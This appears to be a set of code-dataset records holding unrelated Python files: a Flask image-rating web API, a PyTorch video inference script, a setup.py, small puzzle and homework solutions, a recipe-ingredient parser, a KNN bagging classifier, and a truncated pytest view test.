\"ImageRelativity\"\ndescription_table = \"ImageDescription\"\nsynset_table = \"SynsetMap\"\ndb = databasehandler.DatabaseMySQL(database_ip,username,passwd,database_name)\nuser_info_columns = [\"UserName\",\"UserID\"]\nre = db.selectdistinct(preference_table,user_info_columns)\nuser_id_list = {}\nfor user in re:\n user_id_list[user[0]] = int(user[1])\nprint(user_id_list)\n\n#Variables\nstatus = \"test\"\ntranslator = googletrans.Translator()\n\n\n#Paths\nbase_path = \"/home/li/webapi/\"\nuser_path = base_path + \"user/\"\nbroken_image_list_path = \"/home/li/datasets/broken_list_id.txt\"\ntranslate_file_path = \"/home/li/datasets/imageinfo_wnid_translate.txt\"\n\n################## Translate\n\nchinese_dic = {}\njapanese_dic = {}\nwnid_list = []\nwith io.open(translate_file_path,'r',encoding='utf-8') as translate_f:\n for line in translate_f.readlines():\n line = line.strip('\\n')\n l_list = line.split('\\t')\n wnid = str(l_list[0])\n chinese = l_list[2]\n japanese = l_list[3]\n wnid_list.append(wnid)\n chinese_dic[wnid] = chinese\n japanese_dic[wnid] = japanese\n #print(chinese_dic[wnid])\n #print(japanese_dic[wnid])\n\n\n#print(wnid_list)\ncategory_num = len(wnid_list)\n\n##################\n\n#Functions\ndef get_random_image():\n random_category_index = random.randint(0,category_num - 1)\n condition_dic = {}\n condition_dic[\"Class0WNID\"] = wnid_list[random_category_index]\n columns = [\"ImageName\",\"IndexID\",\"Path\",\"Source\",\"Class0Name\",\"Class0WNID\"]\n re = db.selectrandom(image_table,columns = columns, condition_dic = condition_dic)\n return re\n\n\ndef update_image(username):\n current_user_path = user_path + str(username) + \"/\"\n eva_image_path = current_user_path + \"evaluate_image.jpg\"\n com_image_path = current_user_path + \"compare_image.jpg\"\n imageinfo_file_path = current_user_path + \"image_info.txt\"\n eva_image_dic = get_random_image()\n eva_image_file = eva_image_dic[\"Path\"] + eva_image_dic[\"ImageName\"] + \".jpg\"\n com_image_dic = get_random_image()\n com_image_file = com_image_dic[\"Path\"] + com_image_dic[\"ImageName\"] + \".jpg\"\n eva_image_id = int(eva_image_dic[\"IndexID\"])\n com_image_id = int(com_image_dic[\"IndexID\"])\n eva_image_name = eva_image_dic[\"Class0Name\"]\n eva_image_wnid = eva_image_dic[\"Class0WNID\"]\n com_image_name = com_image_dic[\"Class0Name\"]\n com_image_wnid = com_image_dic[\"Class0WNID\"]\n img_dic = {}\n img_dic[\"Evaluation ID\"] = eva_image_id\n img_dic[\"Compare ID\"] = com_image_id\n img_dic[\"Evaluation Name\"] = eva_image_name\n img_dic[\"Compare Name\"] = com_image_name\n imageinfo_file = open(imageinfo_file_path,'w')\n imageinfo_file.write(json.dumps(img_dic))\n imageinfo_file.close()\n\n eva_trans_ja = japanese_dic[str(eva_image_wnid)]\n eva_trans_ch = chinese_dic[str(eva_image_wnid)]\n com_trans_ja = japanese_dic[str(com_image_wnid)]\n com_trans_ch = chinese_dic[str(com_image_wnid)]\n \n eva_img = cv2.imread(eva_image_file)\n cv2.imwrite(eva_image_path,eva_img)\n com_img = cv2.imread(com_image_file)\n cv2.imwrite(com_image_path,com_img)\n with open(eva_image_path,'r') as eva_image_f:\n eva_image_stream = eva_image_f.read()\n eva_image_stream = base64.b64encode(eva_image_stream)\n with open(com_image_path,'r') as com_image_f:\n com_image_stream = com_image_f.read()\n com_image_stream = base64.b64encode(com_image_stream)\n return eva_image_id,com_image_id,eva_image_stream,com_image_stream,eva_image_name,com_image_name,eva_image_wnid,com_image_wnid,eva_trans_ja,eva_trans_ch,com_trans_ja,com_trans_ch\n \n \n\n\n\napp = flask.Flask(api_name)\n\n@app.route('/home', methods = ['GET','POST'])\ndef home():\n return render_template('imagenet_home_v2.html')\n\n\n@app.route('/login', methods = ['POST','GET'])\ndef login():\n username = request.form.get(\"username\")\n \n print(username)\n if username==None:\n return render_template('imagenet_home_v2.html')\n elif username==\"\":\n return render_template('imagenet_home_v2.html')\n\n username = str(username).lower()\n current_user_path = user_path + str(username) + \"/\"\n userinfo_file_path = current_user_path + \"info.txt\"\n userlog_file_path = current_user_path + \"log.txt\"\n\n \n if username in user_id_list.keys():\n userid = user_id_list[username]\n else:\n userid = len(user_id_list.keys())\n user_id_list[username] = int(userid)\n \n if os.path.exists(current_user_path):\n i = 1\n else:\n os.mkdir(current_user_path)\n userinfo_file = open(userinfo_file_path,'w')\n userinfo_dic = {}\n userinfo_dic[\"UserName\"] = username\n userinfo_dic[\"UserID\"] = int(userid)\n userinfo_file.write(json.dumps(userinfo_dic) + \"\\n\")\n userinfo_file.close()\n userlog_file = open(userlog_file_path,'w')\n userlog_file.close()\n\n eva_image_id,com_image_id,eva_image_stream,com_image_stream,eva_image_name,com_image_name,eva_image_wnid,com_image_wnid,eva_trans_ja,eva_trans_ch,com_trans_ja,com_trans_ch = update_image(username)\n return render_template(\"imagenet_eva_touch.html\",UserName = username,UserID = userid,\n EvaluationID = eva_image_id,CompareID = com_image_id,\n EvaImageStream = eva_image_stream, ComImageStream = com_image_stream,\n EvaluationName = eva_image_name,CompareName = com_image_name,\n EvaluationWNID = eva_image_wnid,CompareWNID = com_image_wnid,\n EvaluationTranslateJa = eva_trans_ja, EvaluationTranslateCh = eva_trans_ch,\n CompareTranslateJa = com_trans_ja, CompareTranslateCh = com_trans_ch)\n\n\n@app.route('/log', methods=['POST'])\ndef log():\n log_dic = {}\n username = request.form[\"UserName\"]\n userid = request.form[\"UserID\"]\n current_user_path = user_path + str(username) + \"/\"\n userinfo_file_path = current_user_path + \"info.txt\"\n userlog_file_path = current_user_path + \"log.txt\"\n eva_imageid = request.form[\"EvaluationID\"]\n com_imageid = request.form[\"CompareImageID\"]\n eva_imagewnid = request.form[\"EvaluationWNID\"]\n com_imagewnid = request.form[\"CompareWNID\"]\n describe = request.form[\"Description\"]\n preference_eva = request.form[\"Preference_Image_eva\"]\n preference_com = request.form[\"Preference_Image_com\"]\n known = \"yes\"\n if (username == \"test\"):\n status = \"test\"\n else:\n status = \"log\"\n \n relativity = request.form[\"Relativity\"]\n \n log_dic = {}\n log_dic[\"UserName\"] = str(username)\n log_dic[\"UserID\"] = str(userid)\n log_dic[\"ImageID\"] = str(eva_imageid)\n log_dic[\"ImageClassWNID\"] = str(eva_imagewnid)\n log_dic[\"Status\"] = str(status)\n log_dic[\"Preference\"] = str(preference_eva)\n db.insert(preference_table,log_dic)\n\n log_dic = {}\n log_dic[\"UserName\"] = str(username)\n log_dic[\"UserID\"] = str(userid)\n log_dic[\"ImageID\"] = str(com_imageid)\n log_dic[\"ImageClassWNID\"] = str(com_imagewnid)\n log_dic[\"Status\"] = str(status)\n log_dic[\"Preference\"] = str(preference_com)\n db.insert(preference_table,log_dic)\n\n log_dic = {}\n log_dic[\"UserName\"] = str(username)\n log_dic[\"UserID\"] = str(userid)\n log_dic[\"ImageID_1\"] = str(eva_imageid)\n log_dic[\"ImageID_2\"] = str(com_imageid)\n log_dic[\"ImageClassWNID_1\"] = str(eva_imagewnid)\n log_dic[\"ImageClassWNID_2\"] = str(com_imagewnid)\n log_dic[\"Status\"] = str(status)\n log_dic[\"Relativity\"] = str(relativity)\n db.insert(relativity_table,log_dic)\n\n if describe != \"NULL\":\n log_dic = {}\n log_dic[\"UserName\"] = str(username)\n log_dic[\"UserID\"] = str(userid)\n log_dic[\"ImageID\"] = str(com_imageid)\n log_dic[\"ImageClassWNID\"] = str(com_imagewnid)\n log_dic[\"Status\"] = str(status)\n log_dic[\"Description\"] = str(describe.encode(\"utf-8\"))\n db.insert(description_table,log_dic)\n \n \n if os.path.exists(userlog_file_path):\n with open(userlog_file_path,'a') as userlog_f:\n userlog_f.write(json.dumps(log_dic) + \"\\n\")\n else:\n with open(userlog_file_path,'w') as userlog_f:\n userlog_f.write(json.dumps(log_dic) + \"\\n\")\n \n \n \n eva_image_id,com_image_id,eva_image_stream,com_image_stream,eva_image_name,com_image_name,eva_image_wnid,com_image_wnid,eva_trans_ja,eva_trans_ch,com_trans_ja,com_trans_ch = update_image(username)\n return render_template(\"imagenet_eva_touch.html\",UserName = username,UserID = userid,\n EvaluationID = eva_image_id,CompareID = com_image_id,\n EvaImageStream = eva_image_stream, ComImageStream = com_image_stream,\n EvaluationName = eva_image_name,CompareName = com_image_name,\n EvaluationWNID = eva_image_wnid,CompareWNID = com_image_wnid,\n EvaluationTranslateJa = eva_trans_ja, EvaluationTranslateCh = eva_trans_ch,\n CompareTranslateJa = com_trans_ja, CompareTranslateCh = com_trans_ch)\n\n\n@app.route('/next', methods=['POST'])\ndef next_image():\n username = request.form[\"UserName\"]\n userid = request.form[\"UserID\"] \n eva_image_id,com_image_id,eva_image_stream,com_image_stream,eva_image_name,com_image_name,eva_image_wnid,com_image_wnid,eva_trans_ja,eva_trans_ch,com_trans_ja,com_trans_ch = update_image(username)\n return render_template(\"imagenet_eva_touch.html\",UserName = username,UserID = userid,\n EvaluationID = eva_image_id,CompareID = com_image_id,\n EvaImageStream = eva_image_stream, ComImageStream = com_image_stream,\n EvaluationName = eva_image_name,CompareName = com_image_name,\n EvaluationWNID = eva_image_wnid,CompareWNID = com_image_wnid,\n EvaluationTranslateJa = eva_trans_ja, EvaluationTranslateCh = eva_trans_ch,\n CompareTranslateJa = com_trans_ja, CompareTranslateCh = com_trans_ch)\n\n\n@app.route('/broken', methods=['POST'])\ndef broken():\n username = request.form[\"UserName\"]\n userid = request.form[\"UserID\"]\n broken_imageid = request.form[\"BrokenID\"]\n with open(broken_image_list_path,'a') as broken_f:\n broken_f.write(str(broken_imageid) + \"\\n\")\n \n eva_image_id,com_image_id,eva_image_stream,com_image_stream,eva_image_name,com_image_name,eva_image_wnid,com_image_wnid,eva_trans_ja,eva_trans_ch,com_trans_ja,com_trans_ch = update_image(username)\n return render_template(\"imagenet_eva_touch.html\",UserName = username,UserID = userid,\n EvaluationID = eva_image_id,CompareID = com_image_id,\n EvaImageStream = eva_image_stream, ComImageStream = com_image_stream,\n EvaluationName = eva_image_name,CompareName = com_image_name,\n EvaluationWNID = eva_image_wnid,CompareWNID = com_image_wnid,\n EvaluationTranslateJa = eva_trans_ja, EvaluationTranslateCh = eva_trans_ch,\n CompareTranslateJa = com_trans_ja, CompareTranslateCh = com_trans_ch)\n\n\n\nif __name__ == '__main__':\n try:\n app.run(debug = True,host = ip_addr, port = ip_port)\n \n finally:\n print(\"server close!\")\n db.close()\n","sub_path":"imagenet_webapi_log_v2.py","file_name":"imagenet_webapi_log_v2.py","file_ext":"py","file_size_in_byte":11900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"215381064","text":"#!python3\nimport torch\nimport cv2\nfrom PIL import Image\nimport torchvision.transforms as transforms\nimport numpy as np\nfrom Model_Class_From_the_Scratch import MODEL_From_Scratch\nfrom Model_Class_Transfer_Learning_MobileNet import MobileNet\nimport argparse\n\nclass Inference_Class():\n def __init__(self):\n USE_CUDA = torch.cuda.is_available()\n self.DEVICE = torch.device(\"cuda\" if USE_CUDA else \"cpu\")\n self.model = None\n self.label_map = None\n self.transform_info = transforms.Compose([\n transforms.Resize(size=(224, 224)),\n transforms.ToTensor()\n ])\n\n def load_model(self, is_train_from_scratch, label_map_file = \"label_map.txt\"):\n self.label_map = np.loadtxt(label_map_file, str, delimiter='\\t')\n num_classes = len(self.label_map)\n model_str = None\n if is_train_from_scratch:\n self.model = MODEL_From_Scratch(num_classes).to(self.DEVICE)\n model_str = \"PyTorch_Training_From_Scratch\"\n else:\n self.model = MobileNet(num_classes).to(self.DEVICE)\n model_str = \"PyTorch_Transfer_Learning_MobileNet\"\n model_str += \".pt\"\n self.model.load_state_dict(torch.load(model_str, map_location=self.DEVICE))\n self.model.eval()\n\n def inference_video(self, video_source=\"test_video.mp4\"):\n cap = cv2.VideoCapture(video_source)\n if cap.isOpened():\n print(\"Video Opened\")\n else:\n print(\"Video Not Opened\")\n print(\"Program Abort\")\n exit()\n cv2.namedWindow(\"Input\", cv2.WINDOW_GUI_EXPANDED)\n cv2.namedWindow(\"Output\", cv2.WINDOW_GUI_EXPANDED)\n with torch.no_grad():\n while cap.isOpened():\n ret, frame = cap.read()\n if ret:\n output = self.inference_frame(frame)\n cv2.imshow(\"Input\", frame)\n cv2.imshow(\"Output\", output)\n else:\n break\n if cv2.waitKey(33) & 0xFF == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\n return\n\n def inference_frame(self, opencv_frame):\n opencv_rgb = cv2.cvtColor(opencv_frame, cv2.COLOR_BGR2RGB)\n image = Image.fromarray(opencv_rgb)\n image_tensor = self.transform_info(image)\n image_tensor.unsqueeze(0)\n image_tensor = image_tensor.to(self.DEVICE)\n\n inference_result = self.model(image_tensor)\n\n inference_result = inference_result.squeeze()\n inference_result = inference_result.cpu().numpy()\n result_frame = np.copy(opencv_frame)\n label_text = self.label_map[np.argmax(inference_result)]\n label_text += \" \" + str(inference_result[np.argmax(inference_result)])\n result_frame = cv2.putText(result_frame, label_text, (10, 50), cv2.FONT_HERSHEY_PLAIN, fontScale=2.0, color=(0,0,255), thickness=3)\n return result_frame\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--is_scratch\", \n required=False,\n action=\"store_true\", \n help=\"inference with model trained from the scratch\")\n parser.add_argument(\"-src\", \"--source\", \n required=False,\n type=str, \n default=\"./test_video.mp4\", \n help=\"OpenCV Video source\")\n\n args = parser.parse_args()\n is_train_from_scratch = False\n source = args.source\n\n if args.is_scratch:\n is_train_from_scratch = True\n if source.isdigit():\n source = int(source)\n\n inferenceClass = Inference_Class()\n inferenceClass.load_model(is_train_from_scratch)\n inferenceClass.inference_video(source)","sub_path":"Inference_Cam.py","file_name":"Inference_Cam.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"36808107","text":"#!/usr/bin/env python\n\"\"\"Treadmill setup.py.\"\"\"\n\n# pip 10.0 moved req to _internal. Need to find better solution, changing\n# for now so that build pass.\ntry:\n import pip.req as pip_req\nexcept ImportError:\n import pip._internal.req as pip_req\n\n\ndef _read_requires(filename):\n reqs = []\n for inst_req in pip_req.parse_requirements(filename, session='no session'):\n req = str(inst_req.req)\n if req == 'kazoo[sasl]':\n inst_req.req = 'kazoo==2.4.0.dev0'\n\n if not inst_req.match_markers():\n print('Skipping %r: %r => False' % (req, inst_req.markers))\n continue\n reqs.append(str(inst_req.req))\n return reqs\n\n\nfrom setuptools import setup # pylint: disable=wrong-import-position\n\n\nsetup(\n version='3.7',\n install_requires=_read_requires('requirements.txt'),\n setup_requires=_read_requires('test-requirements.txt')\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"37598215","text":"import sys\nimport math\n\n# The while loop represents the game.\n# Each iteration represents a turn of the game\n# where you are given inputs (the heights of the mountains)\n# and where you have to print an output (the index of the mountain to fire on)\n# The inputs you are given are automatically updated according to your last actions.\n\ndic = {}\n\n# game loop\nwhile True:\n for i in range(8):\n mountain_h = int(input()) # represents the height of one mountain.\n dic[i] = mountain_h\n dic2 = dic.items()\n montri = sorted(dic2, key=lambda x: x[1], reverse = True)\n print (montri[0][0])\n\n##################################################################### DEBUG\n print(\"Debug messages...\", file=sys.stderr)\n print (dic, file = sys.stderr)\n print (montri, file = sys.stderr)\n\n# Write an action using print\n# To debug: print(\"Debug messages...\", file=sys.stderr)\n# The index of the mountain to fire on.\n\n\n\n","sub_path":"the-descent.py","file_name":"the-descent.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"355087316","text":"# \"OOXXOXXOOO\"와 같은 OX퀴즈의 결과가 있다. O는 문제를 맞은 것이고, X는 문제를 틀린 것이다.\n# 문제를 맞은 경우 그 문제의 점수는 그 문제까지 연속된 O의 개수가 된다.\n# 예를 들어 10번 문제의 점수는 3이 된다.\n# \"OOXXOXXOOO\"의 점수는 1+2+0+0+1+0+0+1+2+3=10점이다.\n# OX 퀴즈의 결과가 주어졌을 떄, 점수를 구하는 프로그램을 작성하시오.\nn = int(input()) # 테스트 케이스의 개수\n\n\nfor i in range(n): # 테스트 케이스만큼 반복\n score = 0\n count = 0 # 연속된 O의 개수를 카운트할 변수\n a = input()\n\n for j in a:\n if j == 'O': # 'O'인 경우\n count += 1 # 'O'가 나왔으니 count + 1\n score += count # count 만큼 더해주기\n elif j == 'X': # 'X'인 경우\n count = 0 # count 0로 초기화\n\n print(score)","sub_path":"18_배연주/session03/05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"646608788","text":"from difflib import SequenceMatcher\nfrom string import punctuation, digits\n\npath_frami = \"../../data/resources/de_DE_frami.dic\"\n\namount_types = [\n 'g', 'kg', 'lb', 'ml', 'l', 'cups', 'cup', 'el', 'tl', 'ml', 'tbsp', 'tsp', 'msp', 'msp.', 'messerspitze', 'stiele',\n 'stiel', 'zweige', 'zweig', 'dosen', 'dose', 'blatt', 'blätter', 'bund', 'cl', 'scheibe', 'scheiben', 'glas',\n 'gläser', 'spritzer', 'stangen', 'prise', 'beutel', 'becher', 'tropfen', 'pk.', 'paket', 'pakete', 'würfel'\n]\n\n\ndef compare_ingredients_with_frami_dict(path_all_ingredients, tagger):\n frami_dict = load_frami_dict_file()\n found_words = []\n\n with open(path_all_ingredients, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n\n for line in lines:\n formatted_ingredient = format_ingredient_line(line)\n tagged_ingredient = tagger.tag_sent(formatted_ingredient)\n\n for element in tagged_ingredient:\n found_word = get_base_form_of_word(element, frami_dict)\n\n if found_word is not None and len(found_word) > 0 and found_word not in found_words:\n found_words.append(found_word)\n\n\ndef load_frami_dict_file():\n out = dict()\n with open(path_frami, 'r') as f:\n lines = f.readlines()\n\n for line in lines[18:]:\n line = line.replace('\\n', '').split('/')\n\n if line[0][0] not in out:\n out[line[0][0]] = dict()\n\n if len(line) == 1:\n out[line[0][0]][line[0]] = \"\"\n else:\n out[line[0][0]][line[0]] = line[1]\n\n return out\n\n\ndef get_most_similar_word_from_frami_dict(word_to_check, frami_dict):\n words_with_same_starting_letter = frami_dict[word_to_check[0]].keys()\n best_score = 0\n most_similar_word = \"\"\n for word in words_with_same_starting_letter:\n score = SequenceMatcher(None, word_to_check, word).ratio()\n\n if score > best_score:\n best_score = score\n most_similar_word = word\n\n return most_similar_word\n\n\ndef get_base_form_of_word(tagged_word, frami_dict):\n if tagged_word[0][0] not in frami_dict:\n return \"\"\n\n if tagged_word[0] not in frami_dict[tagged_word[0][0]]:\n \"\"\"\n if tagged_word[0] not in similarity_ingredient_dict:\n return get_most_similar_word_from_frami_dict(tagged_word[0], frami_dict)\n else:\n return tagged_word[0]\n \"\"\"\n pass\n else:\n return tagged_word[0]\n\n\ndef format_ingredient_line(ingredient):\n formatted_ingredient = ingredient.rstrip('\\n')\n formatted_ingredient = formatted_ingredient.translate(ingredient.maketrans('', '', punctuation))\n formatted_ingredient = formatted_ingredient.translate(formatted_ingredient.maketrans('', '', digits))\n formatted_ingredient = remove_amount_types(formatted_ingredient)\n\n return formatted_ingredient\n\n\ndef remove_amount_types(ingr):\n formatted_input = ingr.replace(u'\\xa0', u' ').split(' ')\n out = []\n for element_in_formatted_input in formatted_input:\n if element_in_formatted_input.lower() in amount_types:\n continue\n\n if element_in_formatted_input == ' ':\n continue\n\n if 'à' in element_in_formatted_input:\n continue\n\n if len(element_in_formatted_input) == 0:\n continue\n\n out.append(element_in_formatted_input)\n return out\n","sub_path":"src/_old_code/parsing/parsing_with_frami_dict.py","file_name":"parsing_with_frami_dict.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"150171635","text":"from sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_selection import mutual_info_classif\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import model_selection\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn.utils import shuffle\nfrom sklearn import metrics\nfrom sklearn import preprocessing\nimport pandas as pd\nimport numpy as np\n\npd.options.mode.chained_assignment = None\n\n\n#neigh = KNeighborsClassifier(n_neighbors=3)\ndataSet = pd.read_csv(\"/home/maryam/Documents/AI/CA4/data.csv\")\ndataSetPositive = dataSet[(dataSet[[\"Total Quantity\", \"Total Price\", \"Purchase Count\"]] > 0).all(1)]\ndataSetPositive[\"Date\"] = pd.to_datetime(dataSetPositive[\"Date\"])\ndataSetPositive['month'] = dataSetPositive['Date'].dt.month\ndataSetPositive[\"Day\"] = dataSetPositive[\"Date\"].dt.dayofweek\n#dataSetPositive[\"is_weakend\"] = np.where(dataSetPositive[\"Date\"].dt.dayofweek.isin([5, 6]), 1, 0)\n#d = pd.get_dummies(dataSetPositive['Country'])\n#dataSetPositive = dataSetPositive.join(d)\ntarget = dataSetPositive['Is Back'].map({'Yes': 1, 'No': 0})\ndataSetPositive = dataSetPositive.apply(LabelEncoder().fit_transform)\nfeatureNames = list(dataSetPositive.columns)\nfeatureNames.remove('Unnamed: 0')\nfeatureNames.remove('Customer ID')\n#featureNames.remove('Country')\nfeatureNames.remove('Date')\nfeatureNames.remove('Is Back')\nscalesFeatureNames = ['Total Quantity', 'Total Price', 'Purchase Count', 'Country']\nscaledFeatures = dataSetPositive[featureNames].copy()\nfeaturesValues = scaledFeatures[scalesFeatureNames]\nmin_max_scaler = preprocessing.MinMaxScaler(feature_range =(0, 1))\nscaler = min_max_scaler.fit(featuresValues.values)\nfeaturesValues = scaler.transform(featuresValues.values)\nscaledFeatures[scalesFeatureNames] = featuresValues\ntrainData, testData, trainTargets, testTargets = train_test_split(scaledFeatures, target, test_size = 0.2, random_state = 10) # 70% training and 30% test\nKNNClassifier = KNeighborsClassifier(n_neighbors = 49)#, weights = 'distance', p =2, n_jobs = -1)\nbaggibgClassifier = BaggingClassifier(base_estimator=KNNClassifier, n_estimators=15, max_samples = 0.5,\n max_features = 0.5, bootstrap=True, bootstrap_features=False, oob_score=False, warm_start=False, n_jobs=None, random_state=11, verbose=0)\n\nbaggibgClassifier = baggibgClassifier.fit(trainData, trainTargets)\npredictedTargets = baggibgClassifier.predict(testData)\n\nprecisionIsBack = metrics.precision_score(testTargets, predictedTargets, pos_label=1)\nprecisionIsNBack = metrics.precision_score(testTargets, predictedTargets, pos_label=0)\nrecallIsBack = metrics.recall_score(testTargets, predictedTargets, pos_label=1)\nrecallIsNBack = metrics.recall_score(testTargets, predictedTargets, pos_label=0)\n\nprint(\"Is Back\")\nprint(\"Accuracy: \", metrics.accuracy_score(testTargets, predictedTargets) * 100)\nprint(\"Percision: \", precisionIsBack * 100)\nprint(\"Recall: \", recallIsBack * 100)\nprint(\"Is Not Back\")\nprint(\"Accuracy: \", metrics.accuracy_score(testTargets, predictedTargets) * 100)\nprint(\"Percision: \", precisionIsNBack * 100)\nprint(\"Recall: \", recallIsNBack * 100)\nWsBack = len(testTargets[testTargets == 1])\nWsNBack = len(testTargets[testTargets == 0])\nprint(\"CHECK:\")\nprint(\"Avarage Precision: \", ((WsBack * precisionIsBack) + (WsNBack * precisionIsNBack)) / (WsBack + WsNBack) * 100)\nprint(\"Avarage Recall: \", ((WsBack * recallIsBack) + (WsNBack * recallIsNBack)) / (WsBack + WsNBack) * 100) ","sub_path":"BaggingKNN.py","file_name":"BaggingKNN.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"280937239","text":"class Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n if(len(s) != len(t)):\n return False\n \n dic1 = [0]*26\n for i in range(len(s)):\n dic1[ord(s[i])-ord('a')] += 1\n dic1[ord(t[i])-ord('a')] -= 1\n for num in dic1:\n if num != 0:\n return False\n return True","sub_path":"Week_02/valid-anagram-2.py","file_name":"valid-anagram-2.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"435941042","text":"# Copyright (c) MONAI Consortium\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import annotations\n\nimport unittest\n\nimport numpy as np\nimport torch\nfrom parameterized import parameterized\n\nfrom monai.transforms import MeanEnsemble\nfrom tests.utils import TEST_NDARRAYS, assert_allclose\n\nTESTS = []\nfor p in TEST_NDARRAYS:\n TESTS.append([{\"weights\": None}, [p(torch.ones(2, 2, 2)), p(torch.ones(2, 2, 2)) + 2], p(torch.ones(2, 2, 2)) + 1])\n\n TESTS.append(\n [{\"weights\": None}, p(torch.stack([torch.ones(2, 2, 2), torch.ones(2, 2, 2) + 2])), p(torch.ones(2, 2, 2)) + 1]\n )\n\n TESTS.append(\n [{\"weights\": [1, 3]}, [p(torch.ones(2, 2, 2)), p(torch.ones(2, 2, 2)) + 2], p(torch.ones(2, 2, 2)) * 2.5]\n )\n\n TESTS.append(\n [\n {\"weights\": [[1, 3], [3, 1]]},\n [p(torch.ones(2, 2, 2)), p(torch.ones(2, 2, 2)) + 2],\n p(torch.ones(2, 2, 2) * torch.tensor([2.5, 1.5]).reshape(2, 1, 1)),\n ]\n )\n\n TESTS.append(\n [\n {\"weights\": np.array([[1, 3], [3, 1]])},\n [p(torch.ones(2, 2, 2)), p(torch.ones(2, 2, 2)) + 2],\n p(torch.ones(2, 2, 2) * torch.tensor([2.5, 1.5]).reshape(2, 1, 1)),\n ]\n )\n\n TESTS.append(\n [\n {\"weights\": torch.tensor([[[1, 3]], [[3, 1]]])},\n [p(torch.ones(2, 2, 2, 2)), p(torch.ones(2, 2, 2, 2)) + 2],\n p(torch.ones(2, 2, 2, 2) * torch.tensor([2.5, 1.5]).reshape(1, 2, 1, 1)),\n ]\n )\n\n\nclass TestMeanEnsemble(unittest.TestCase):\n @parameterized.expand(TESTS)\n def test_value(self, input_param, img, expected_value):\n result = MeanEnsemble(**input_param)(img)\n assert_allclose(result, expected_value)\n\n def test_cuda_value(self):\n img = torch.stack([torch.ones(2, 2, 2, 2), torch.ones(2, 2, 2, 2) + 2])\n expected_value = torch.ones(2, 2, 2, 2) * torch.tensor([2.5, 1.5]).reshape(1, 2, 1, 1)\n if torch.cuda.is_available():\n img = img.to(torch.device(\"cuda:0\"))\n expected_value = expected_value.to(torch.device(\"cuda:0\"))\n result = MeanEnsemble(torch.tensor([[[1, 3]], [[3, 1]]]))(img)\n assert_allclose(result, expected_value)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_mean_ensemble.py","file_name":"test_mean_ensemble.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"523465956","text":"# Write a python method that takes a dictionary of school courses and the students enrolled\n#    in each course and returns a dictionary of students with the courses they are enrolled\n#    in, sorted alphabetically.\n\n#     Example input: {'classA': ['student1', 'student2'], 'classB': ['student2']}\n#     Example output: {'student1': ['classA'], 'student2': ['classA', 'classB']}\n\nclassRoster = classRoster = {'classA': ['dave', 'ashley', 'ben', 'tom'], 'classB': ['dave', 'ashley', 'zed', 'humphrey']}\n\ndef displayStudentSchedule(classRoster):\n students = []\n result = {}\n\n # Grab every unique student and add them to a list of students\n # This is so we can sort them before adding them each as a dictionary key\n for course, studentArray in classRoster.items():\n for student in studentArray:\n if student not in students:\n students.append(student)\n\n students.sort()\n\n # Add each student as a dict key (will already be sorted, as mentioned above)\n for student in students:\n result[student] = []\n\n # Iterate through each course's list of students\n # Add each course to the student's value (a list) stored in result\n for course in classRoster:\n for student in classRoster[course]:\n result[student].append(course)\n\n print(result)\n\ndisplayStudentSchedule(classRoster)","sub_path":"school.py","file_name":"school.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"187456657","text":"from django.urls import reverse\nimport pytest\nfrom pytest_django.asserts import assertTemplateUsed\nfrom Post.views import get_post_by_query_text\n\n\nclass TestViews:\n @pytest.mark.django_db\n def test_view_posts_GET(self, client):\n response = client.get(reverse('view posts'))\n assert response.status_code == 200\n assertTemplateUsed(response, 'Post/postList.html')\n\n @pytest.mark.parametrize(\n \"query_text, expected_output\",\n [\n (\"Sea\", [\"Dead Sea\", \"Sea of Galilee\", \"Eilat\"]),\n (\"beautiful\", [\"Dead Sea\", \"Eilat\", \"`En Yorqe`am\"]),\n (\"nice\", [\"`En Yorqe`am\"]),\n (\"place\", [\"`En Yorqe`am\", \"Eilat\", \"Dead Sea\"]),\n (\"Tal aviv\", []),\n (\n \"\",\n [\n \"Dead Sea\",\n \"Sea of Galilee\",\n \"Eilat\",\n \"`En Yorqe`am\",\n \"En gedi\",\n \"Ramon Crater\",\n ],\n ),\n ],\n )\n @pytest.mark.django_db\n def test_post_exists_after_query(self, query_text, expected_output):\n posts = 